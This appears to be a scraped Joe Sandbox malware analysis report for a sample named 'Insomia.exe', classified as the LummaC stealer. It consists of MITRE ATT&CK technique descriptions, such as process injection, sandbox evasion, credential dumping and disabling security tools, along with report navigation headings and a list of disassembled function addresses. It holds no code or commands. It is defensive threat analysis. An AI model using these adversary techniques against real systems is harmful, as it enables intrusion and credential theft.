Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Insomia.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
Insomia.exe

Function 016D2A2E Relevance: 14.1, Strings: 11, Instructions: 330
COMMON

Function 05E92DE4 Relevance: 9.4, Strings: 6, Instructions: 1933
COMMON

Function 016DC950 Relevance: 6.0, Strings: 4, Instructions: 956
COMMON

Function 05EE0040 Relevance: 3.8, Strings: 2, Instructions: 1335
COMMON

Function 061BAE08 Relevance: 3.1, Strings: 2, Instructions: 607
COMMON

Function 05E9C5C8 Relevance: 2.8, Strings: 2, Instructions: 347
COMMON

Function 061BADA9 Relevance: 2.7, Strings: 2, Instructions: 193
COMMON

Function 016D8CA8 Relevance: 2.7, Strings: 2, Instructions: 172
COMMON

Function 016D8CB8 Relevance: 2.7, Strings: 2, Instructions: 165
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre